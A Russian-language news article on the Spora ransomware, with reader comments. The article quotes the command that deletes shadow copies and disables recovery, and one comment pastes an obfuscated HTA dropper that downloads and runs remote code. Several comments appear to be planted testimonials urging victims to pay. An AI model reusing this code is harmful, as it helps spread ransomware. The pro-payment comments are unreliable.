Первыми появление вымогателя Spora заметили пользователи форумов Bleeping Computer и «Лаборатории Касперского». Опираясь на жалобы пользователей, исследователи Emsisoft, MalwareHunterTeam и журналисты Bleeping Computer изучили малварь и пришли к выводу, что шифровальщик весьма необычен.

В настоящее время Spora распространяется посредством почтового спама: вредоносные письма содержат вложенные архивы ZIP, внутри которых находятся файлы HTA (HTML Application). Причем HTA используется в качестве добавочного расширения, то есть расширения файлов выглядят как PDF.HTA или DOC.HTA. Так как на компьютерах большинства пользователей отображение расширений отключено, потенциальные жертвы увидят только первую часть, решив, что перед ними обычный документ.

Если пользователь запускает HTA-файл, в директорию %Temp% извлекается Javascript-файл close.js, который создает исполняемый файл со случайным именем (в тестах исследователей — 81063163ded.exe)  и запускает его. Это и есть основная часть малвари, которая немедленно начинает шифрование данных. Чтобы отвлечь внимание жертвы, Spora также извлекает и открывает файл DOCX. Так как данный файл намеренно поврежден, он отобразит ошибку. Для пользователя все будет выглядеть так, будто документ из письма, который он попытался открыть, был поврежден при передаче или загрузке.

В отличие от большинства современных шифровальщиков, Spora работает в оффлайне и не создает никакого сетевого трафика, а также весьма избирательно подходит к шифрованию файлов. Малварь интересуют только следующие расширения: .xls, .doc, .xlsx, .docx, .rtf, .odt, .pdf, .psd, .dwg, .cdr, .cd, .mdb, .1cd, .dbf, .sqlite, .accdb, .jpg, .jpeg, .tiff, .zip, .rar, .7z, .backup.  Кроме того, шифровальщик не изменяет расширения файлов, что тоже достаточно необычно. Чтобы не повредить ОС слишком сильно и не помешать работе компьютера, Spora не трогает папки games, Program files (x86), Program files и Windows.

Согласно данным специалиста Emsisoft Фабиана Восара (Fabian Wosar), Spora шифрует файлы надежным и сложным способом, и никаких слабых мест эксперту обнаружить не удалось. Восар опубликовал развернутый пост, посвященный работе системы шифрования Spora. По сути, вымогатель генерирует мастер-ключ .KEY, а также создает ключ шифрования для блокирования данных жертвы.

«Генерируется RSA-ключ, генерируется AES-ключ, RSA-ключ шифруется с помощью AES-ключа, сам AES-ключ шифруется с использованием публичного ключа, встроенного в код исполняемого файла, а затем оба ключа сохраняются в .KEY-файл», — рассказывает про .KEY-файл Восар.

Процесс шифрования информации жертвы выглядит немногим проще, вот как его описывает Восар:

«Генерируется ключ AES, который шифруется сгенерированным ключом RSA, затем файлы жертвы шифруются с использованием AES-ключа и все это сохраняется в файл. Для расшифровки данных нужно послать им .KEY-файл. Тогда они смогут использовать приватный ключ и дешифровать AES-ключ, который использовался для шифрования RSA-ключа для вашей системы, а затем расшифровать и его. Скорее всего, потом они вставляют RSA-ключ в декриптер и отсылают декпритер вам. Дешифровщик использует RSA-ключ, чтобы расшифровать AES-ключи в файлах и сами файлы с их помощью».

Публичный RSA-ключ, жестко закодированный в Spora:

——BEGIN PUBLIC KEY——MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC6COfj49E0yjEopSpP5kbeCRQp
WdpWvx5XJj5zThtBa7svs/RvX4ZPGyOG0DtbGNbLswOYKuRcRnWfW5897B8xWgD2
AMQd4KGIeTHjsbkcSt1DUye/Qsu0jn4ZB7yKTEzKWeSyon5XmYwoFsh34ueErnNL
LZQcL88hoRHo0TVqAwIDAQAB
——END PUBLIC KEY——

Кроме того, завершив шифрование, вымогатель также выполняет CLI-команду, которая удаляет теневые копии, отключает Windows Startup Repair и вносит изменения в BootStatusPolicy:

process call create «cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures»

Как только процесс шифрования окончен, Spora добавит .KEY-файл и сообщение с требованием выкупа на рабочий стол пользователя и в другие папки. Сообщение содержит не только подробные инструкции, но и уникальный ID жертвы в формате CCCXX-XXXXX-XXXXX-XXXXX-XXXXX или CCXXX-XXXXX-XXXXX-XXXXX-XXXXX, где CCC и CC – это код страны, а X – буквы и цифры.

Исследователи не могли не отметить, что сайт злоумышленников, на который шифровальщик отправляет жертву, выглядит крайне профессионально и необычно. Хотя вымогатель отсылает пострадавших по адресу Spora.bz – это не более чем Tor-гейтвей, и операторы малвари используют не менее десятка разных URL. Более того, сайт заботится о посетителях и использует SSL-сертификат Comodo.

На настоящем сайте в даркнете пользователю нужно будет не только ввести свой ID, но и провести «синхронизацию»: для этого понадобится загрузить на сайт .KEY-файл.

После авторизации (посредством ID) и синхронизации, пользователю станут доступны различные опции, каждая из которых комплектуется развернутым всплывающим описанием. Операторы малвари предлагают своим жертвам не только обычную расшифровку данных, на сайте можно найти следующие опции:

  • расшифровка всех файлов (79$);
  • купить иммунитет против будущих инфекций Spora ($50);
  • удалить все связанные со Spora файлы после оплаты выкупа ($20);
  • восстановить файл ($30);
  • восстановить два файла бесплатно.

Исследователи пишут, что основываясь на данных .KEY-файла сайт шифровальщика отображает разные цены для разных пользователей. Все зависит от того, как много данных было на машине жертвы и насколько критичной была зашифрованная информация. Так, если простого пользователя попросят заплатить $79, то компании полная расшифровка данных обойдется в $280.

Согласно данным MalwareHunterTeam, большинство пострадавших от Spora пользователей, воспользовавшихся сервисом идентификации малвари ID-Ransomware, были из России. Более того, сообщение с требованием выкупа и вредоносные письма, распространяющие шифровальщика, тоже написаны на русском языке. Не трудно сделать вывод, что основной целью Spora на текущий момент являются российские пользователи.

Исследователи сравнивают Spora с такими профессионально написанными шифровальщиками, как Locky и Cerber. По мнению экспертов, над Spora работала группа людей, которая ранее уже занималась вымогательским ПО. Эти люди хорошо понимают, что делают.



35 комментариев

  1. Int

    13.01.2017 at 12:27

    Каким образом js создаёт файл, да ещё и запускает его?

    • gwindlord

      15.01.2017 at 11:13

      WSH, наверное. А вот с созданием файла действительно интересно, либо он крохотный и лежит в коде например, как BASE64-массив, либо качает можт.

    • AleksPAS

      16.01.2017 at 18:32

      JS представляет собой своеобразный архив с тремя файлами: шифровальщик, hta сообщения и битый (или не битый) doc

    • Il

      12.02.2017 at 14:21

      В обфусцированный js файл вшит exe-шник, который при запуске и шифрует файлы.

  2. Capricorn404

    13.01.2017 at 12:53

    Напоминает последние версии Bat.Scatter. Не удивлюсь, если авторы те же.

  3. wanderer5800

    15.01.2017 at 22:52

    Честно говоря, не совсем понятно, зачем нужна дополнительная обертка RSA ключом. Почему бы просто не сгенерировать AES ключ, зашифровать его на СВОЁМ вшитом открытом ключе RSA и поместить зашифрованные данные в .KEY. Для расшифрования также попросить .KEY, расшифровать ключ AES и отправить декриптор со вшитым ключом AES.

  4. victim

    30.01.2017 at 18:48

    Доброго времени всем! Будьте аккуратны, к несчастью мы столкнулись с этой проблемой, перевели деньги, однако есть проблема с расшифровкой файлов, часть файлов не расшифровывается (к примеру файловая база 1с). Общение со злоумышленниками не дало результата..

  5. avspore

    02.02.2017 at 11:09

    Всем привет! столкнулись с этой проблемой. Вирус интересен тем, что не меняет название файлов и люди замечают проблему только после того как не открылся файл, да и притом не сразу понимают проблему. Вирус сложный и интересный по своему, шифровальщик. По опыту сталкивался с разными шифровальщиками на протяжении последних нескольких лет, такая беда впервые (( Самое интересное что на момент заражения (утро 8 часов обновленный доктор веб его не обнаруживал, обнаружил только к концу дня). Одно порадовало — личный кабинет, сделано прям как в лучших традициях интернет-магазинов. Даже (!) поддержка есть, причем отвечают достаточно оперативно. Есть сервис по проверке привязки ключей, загружаешь файл — скачиваешь дешифрованный. Только еще прикол в том, что если есть сеть, то распространяется через сетевые папки и шифрует компьютеры дальше. В нашем случае купили ключи получили моментально закрытые и дешифратор. Обычный дешифратор, запускаешь и всё дешифрует, только проблема с сетевыми папками, но (!) всё в том же волшебном чате, оказали поддержку, дали даже утилиту для сетевых папок. Печально конечно ибо денег стоило, но без вариантов как и с большинством новых шифровальщиков. А так все как у всех, оплата через биткоин. Но не кидают, по крайней мере нас. Так что горестно что встряли, парни молодцы что не кинули, негодяи что такую печаль создали (хотя тут тоже можно похвалить и сказать что молодцы, сидят в тайланде наверное и отдыхают). За данное сообщение обещали отдать 10% за отзыв.

    • Capricorn404

      02.02.2017 at 13:17

      Отличная реклама авторам шифровальщика.
      Так скоро кибервымогательство станет вполне легальным бизнесом. 😂😂😂😂

  6. marx

    03.02.2017 at 09:38

    Привет всем бедолагам подхватившие вирус spora! Вирь попал к нам через почтовый сервер и минуя все антивирусы и прочую защиту стал шифровать данные сначала на локальном ПК, потом полез по сети в поисках доступных для записи папок, конечно тут сработал человеческий фактор! После шифровки вылезло сообщение о том что файлы зашифрованы и ключ, с которым можной войти в персональный кабинет.
    В персональном кабинете после синхронизации все доступно расписано, что куда, кому и сколько нужно отдать что бы вернуть свое добро! Ниже скрин кабинета после покупки ПО.

    В кабинете есть чат, чат живой но всего доступно 10 сообщений! В чате пишут такие же бедолаги, им отвечает админ. Кстати просить скидку бесполезно. Сколько не просили все бестолку. В итоге пришлось покупать полное восстановление, которое нам обошлось в 280$ . В итоге пока шла транзакция курс поменялся и получилось что денег прилетело больше на 10$ . После пополнения баланса доступна покупа «полное восстановление» После покупки с баланса списывается 280$ и теперь можем скачать дешифратор. Скачиваем , в архиве был ключ и exe-файл. Для безопасности сложили все файлы из сети на отдельный комп и там запустили программу. Открылась командная строка и побежали строчки. Программа отработала около 2 часов все информация была восстановлена.

  7. ИвановИван

    03.02.2017 at 10:11

    Мой сказ о SPORE. Все случилось как всегда в самый «подходящий» момент 27.01.2017, послеобеденную дремоту админа нарушил звонок бухгалтера – файл что то не открывается… Пятница…Не сразу разобрались что случилось, файлы все есть но что то не так, даты у всех одинаковые, 1:30 от заражения. Допрос бухгалтера все прояснил, открыла некий архив , с каким то вложением. Ну далее как обычно локализация, осознание, чтение форумов, в том числе и этой ветки, понимание. Решаем, произвести оплату. И так имеем зашифрованы: рабочие столы, документы и общие сетевые ресурсы. Хорошо сделанная инструкция и присутствие поддержки, не отпугивают. Обмен денег на биткоины с небольшим запасиком. 28.01.2017 в 12:00 по Москве связываемся с обменником с самым выгодным курсом, перевод со сберкакарты, через 15-20 минут в личном кабинете скачиваем ключ и дешифратор. Проверяем- работает, ну и запускам процесс. Через 2 часа все готово. Документы как зашифровали, так и расшифровали. Настраиваем резервирование, выдыхаем. Конец истории. Мораль – делайте бацкапы! На компах ДрВеб корпоративный – купленный, стал видеть SPORE только 30.01.2017.

  8. Михаил1973

    03.02.2017 at 21:47

    ВСЕМ! ВСЕМ! ВСЕМ! Я не БОТ, а реальный человек ID: 58681FFA538BE6, который так же пострадал от шифровальщика Spora. Ребята хочу сказать, что они действительно существуют и действительно по чесноку выполняют свои обязательства, тем кто с ними связывался и оплачивал расшифровку, никакого КИДНЯКА НЕТ!!! Вот моя история: — Я как и многие здесь схватил этого червяка16.01.2017г. даже не знаю, как это произошло. Но не в этом суть. Пробовал разные, защиты, ходил к знакомым компьюторщикам, но все разводили руками и говорили мне Чувак ты попал. Ничего не помогало. Я сам музыкант и у меня все мои рукописи, рабочий материал и фотоматериал для нового альбома и сайта зашифровались. ТРАГЕДИЯ ПОЛНАЯ! Что делать не знал, просто ступор.. Денег к сожалению тоже нет, они появятся ближе к лету, а сейчас вообще жоппппа занимал деньги на памперсы ребенку. Решил им написать и просто поговорить, ведь они тоже люди. Написал им письмо в ЧАТ, можете его посмотреть, оно там под цифрой 5, такое, очень длинное. Они посмотрели и сняли с меня все ограничения и дедлайн до появления у меня возможности им оплатить. Но оплатить я смогу, не раньше чем летом, и я вновь им решил написать, не надеясь, на то, что поможет, но маленькая надежда была. Я попросил их в ЕДИНИЧНОМ случаи снять с меня шифровальщик и восстановить все мои утерянные файлы. Они мне пообещали. Честно говоря, не очень верил, НО ОНИ СНЯЛИ И ПОЛНОСТЬЮ ВОССТАНОВИЛИ все файлы. РЕБЯТА за базар отвечают. Это я вам рассказываю, к тому, что они действительно выполняют свои обязательства. В ЧАТе многие писали, что они оплатили и им все восстановили — это не лохотрон — это правда так и есть. Кому нужна ВАША информация, платите и не переживайте, ВСЕ ВЕРНУТ! Не оскорбляйте, не материтесь и не опускайтесь ниже плинтуса, ведь здесь наверняка есть девушки, и к сожалению дети. Ведите себя достойно, не смотря не на что, оставайтесь людьми. Всем УДАЧИ! НЕ ПЕРЕЖИВАЙТЕ ОПЛАЧИВАЙТЕ И ВСЕ ВОССТАНОВИТЬСЯ!

    • Capricorn404

      03.02.2017 at 22:15

      А скажите мне, Михаил1973. Если вы реальная жертва этих «ребят», зачем вы им рекламу делаете? Правильно ли я понял, что таков был ваш уговор с ними? Будет интересно увидеть и комментарий человека от них, который станет проверять ваш пост.

  9. Михаил1973

    04.02.2017 at 18:49

    Здравствуйте, ребята «умоляю» никакой рекламы, я просто говорю о том, что если у вас ОЧЕНЬ ВАЖНАЯ информация, то можете не бояться за свои оплаченные деньги, они все вернут…, если «инфа» так себе, конечно лучше не платить. Каждый решает для себя сам… Но пока, я еще ни от кого не слышал, что бы кто-то справился с этой проблемой сам не платя…( Всем добра и удачи!

  10. Patp

    06.02.2017 at 14:21

    Утро начинается не с кофе. Знакомый бухгалтер вызвонила с истеричным криками, то что на ПК ничего не запускается и не открывается. В общем, из серии «Я что-то нажала и всё исчезло». Оказалось, что в почте открыла вложение и словила шифратор Spora. После изучения ситуация, к сожалению, пришлось заплатить $360. После получения шифровальщика всё расшифровалось, включая базы 1С 7.7 и 8.3. Буху урок. Будут чаще делать резервные копии. Будьте осторожны…

  11. Zereteli

    08.02.2017 at 05:44

    Есть у меня экспериментальная версия универсального дешифровщика. Создан совместно с антивирусными компаниями. Пока расшифровывает только файлы .doc Всем интересующим писать на почту S87CDD1F8B2E200@yandex.ru АБСОЛЮТНО БЕСПЛАТНО!!! ВЫ Ничего не теряете!

  12. Zereteli

    08.02.2017 at 05:47

    за манибэк 10% Просят оставить положительные комментарии о них. как выше…

  13. sql3

    10.02.2017 at 08:09

    Доброго времени суток. Я еще один такой человек (ID: 90EE6B7E1345C0), которого заразил данный зловред. И так как бэкапы уже потерлись .( Пришлось воспользоваться их сервисом. Оплатили сначала пробную часть ( в 1000 рублей), пришло быстро. Потом остатки. Все пришло, скачался расшифровщик и мы избежали большой взбучки. Техподдержка отвечает быстро. Так что если файлы нужны, оплачивайте, расшифруют всё, что есть.
    Удачи!

  14. sergiuz

    10.02.2017 at 09:00

    Кроме бекапов, которые лучше всего хранить в нескольких экземплярах в нескольких местах, ОБЯЗАТЕЛЬНО нужно проводить обучение пользователей. У себя в конторе я организовал такое обучение — написал регламент (если кому интересно — выложу ссылку), согласовал с руководством и юзеры теперь по-очереди приходят ко мне и сдают экзамен. Я подробно описал, какие опасности несёт такой вирус, как от него защититься, как распознать мошенническое письмо. Коллеги-сисадмины, подумайте над этим — юзеров нужно обучать хотя бы основам компьютерной безопасности. И обязательно — в принудительном порядке, иначе толку не будет.

  15. TRuF

    14.02.2017 at 10:38

    Вот таким образом это говно стартует.
    Пришло по почте в архиве *.rar файл *.hta размером 2613байт.
    Судя по коду делает всё как описано выше.
    Дабы не распространять рабочий вредоносный код несколько символов в бинарнике изменены.
    Будьте бдительны, руки менеджерам и бухгалтерам вправить в нужное место:)
    На спамфильтрах почтовиках попытаться настроить отсечение мелких архивов.

    /// 231b6cab8f093d6b8fcf224a9470921f
    var g=2+3
    if (g=5)
    /// f3bde637038f2de9838e4700b8cddf5c
    {try{ty=new ActiveXObject(«Excel.Application»)}catch(e){};};
    else
    /// a59c6d58d3dc8429d7dcf89dceb88789
    Nothing();
    /// e2502d119f7a98d7fd47fe3a5d2c332f
    /// b59627e8e9a3f95063b80ebd6508481e
    /// b455ff4cfe958f396abcfacf36533c82
    var hol=8+15;
    /// a7bab053a61d99715955e4f220f05e5f
    hol.toString();
    f=new ActiveXObject(«Scripting.FileSystemObject»);s=new ActiveXObject(«ADODB.Stream»);a=new ActiveXObject(«Shell.Application»);x=new ActiveXObject(«Msxml2.FreeThreadedDOMDocument.6.0″);z=f.getSpecialFolder(2)+’\\’+f.getBaseName(f.getTempName())+’.wsf’;var d=f.getBaseName(/filename=»(.+)»/);var r=x.createElement(‘bill’),y=0;r.text=»06964203D226964223E0D0A3C6F626A6563742069643D227479222070726F6769643D226D73786D6C322E786D6C6874747022202F3E0D0A3C6F626A6563742069643D2271222070726F6769643D2241444F44422E436F6E6E656374696F6E22202F3E0D0A3C6F626A6563742069643D22686F222070726F6769643D225368656C6C2E4170706C69636174696F6E22202F3E200D0A3C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A575363726970742E536C6565702832303030290D0A766172206A6F3D322B330D0A76617220676C6F3D380D0A69662028676C6F3D35290D0A7B6A69703D6E657720416374697665584F626A656374282241444F44422E5265636F726473657422297D3B0D0A656C73650D0A7B6E657720416374697665584F626A6563742822536372697074696E672E46696C6553797374656D22297D3B0D0A7661722075203D2074793B0D0A752E6F70656E2822474554222C22687474703A2F2F7374726F796D6F6C6C2E636F6D2F686F6F64222C30293B0D0A752E73656E6428293B0D0A6576616C28752E526573706F6E736554657874293B0D0A203C2F7363726970743E0D0A203C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A20575363726970742E536C6565702832303030290D0A2076617220686F6C3D382B31353B0D0A20686F6C2E746F537472696E6728293B0D0A0D0A20203C2F7363726970743E0D0A».replace(/^\s*(.+\s+){4}/,»),r.dataType=’bin.hex’;s.type=1,s.open(),s.write(r.nodeTypedValue),s.saveToFile(z),s.close();a.ShellExecute(z)
    /// a1325c49cbe093e8c4c0eff6f6e1f54c
    try{f=new ActiveXObject(«Scripting.FileSystemObject»);s=new ActiveXObject(«ADODB.Stream»);a=new ActiveXObject(«Shell.Application»);x=new ActiveXObject(«Msxml2.FreeThreadedDOMDocument.6.0»);var m = new ActiveXObject(«Word.Application»);m.Caption =(«Test»);m.Visible =(«True»);var j = m.Documents.Add();var l = m.Selection;l.TypeText(«»);}catch(e){};try{l.TypeParagraph();j.SaveAs(«bill(14.02.17).doc»);}catch(e){};
    window.close()

  16. Oleg B

    16.02.2017 at 14:03

    Заразил нас этот вирус. Пришла беда откуда не ждали. В итоге пришлось покупать, оплатили не маленькую сумму авторам сего вредоноса. А в итоге, некоторые файлы не расшифровываются. Их хваленная поддержка ни ответила ни на одно письмо на почту, а в чате личного кабинета повторяли одно и тоже. А закончились сообщения и там,теперь вообще не могу с ними связаться. Есть подозрения, что файлы просто поломались после шифровки, и дешифровка их уже не вернет. Заражение другим ID вируса отпадает, т.к. другие файлы в этой же папки расшифровались нормально. Так что, будьте осторожны, покупая дешифровальщик у вас нет 100% гарантии на то, что он расшифрует все ваши файлы. И возможно один из самых необходимых файлов так и будет утерян. А восстановить вряд ли удастся, т.к. «техподдержка» не поможет, потому что вы им не нужны, после того как уже с вас поимели. Вообщем решайте на свой страх и риск.

  17. resistbeer

    20.02.2017 at 10:10

    Уважаемые пользователи, выкупившие дешифратор, помогите, пожалуйста, борьбе с вирусом и выложите присланный мошенниками вам дешифратор и ваш ключ. Все положительные отзывы без выложенных дешифратора и ключа прошу считать купленными отзывами.

  18. Oleg B

    20.02.2017 at 14:59

    Хоть почту оставил бы, куда высылать

  19. MaksT

    21.02.2017 at 18:55

    maksteltow@mail.ru
    Поделитесь пожалуйста.

  20. Рокси

    26.02.2017 at 22:17

    roksirose@gmail.com
    Поделитесь пожалуйста и со мной, заранее спасибо огромное!!!

  21. zerox

    27.02.2017 at 19:19

    На текущий момент расшифровать файлы каким-то универсальным дешифратором невозможно технически. Можно вытащить данные с помощью средств восстановления информации, либо из теневых копий виндовс. Как это сделать подробно описано тут — https://serveradmin.ru/spora-ransomware/ В видео показано для самых неискушенных пользователей, попытаться сможет каждый, а там уже как повезет — восстановит/не восстановит.

  22. ilakuran

    03.03.2017 at 22:06

    Здравствуйте.
    Мы — единственная лаборатория, которая отлично справляется со всеми модификациями трояна-шифровальщика «Spora». Именно я разработал уникальную систему защиты от всех разновидностей вредоносного ПО. С антивирусом Куранина Вы можете не волноваться о появлении подобной угрозы на Вашем ПК/в корпорации/на сервере.

    http://kdefv.ru/ — попробуйте бесплатную пробную версию на 53 дня.

  23. Dimmitry

    16.03.2017 at 08:13

    Нет решения до сих пор?
    Дайте знать пжалста!

  24. Алекс1984

    16.03.2017 at 17:58

    У меня вопрос не решился. Будем ждать решение, у вас аналогичная ситуация? Или Вы можете чем помочь?

  25. Dimmitry

    17.03.2017 at 07:04

    Их сайт недоступен! Отзовитесь кто может помочь?

  26. Dimmitry

    24.03.2017 at 06:25

    Torifyme.com новый адрес мошенников споры. Попробую сегодня им заплатить — отпишу результат позже

    • Escoo

      24.06.2017 at 23:46

      Привет!)

      Подскажи, пожалуйста, ты смог зайти в ЛК через torifyme.com или как-то еще? У меня ноут с этим вирусом и тоже сайт ЛК перестал открываться. Адрес torifyme.com в Chrome не открывается :((((

  27. Dimmitry

    25.03.2017 at 08:10

    Вроде все расшифровалось

Оставить мнение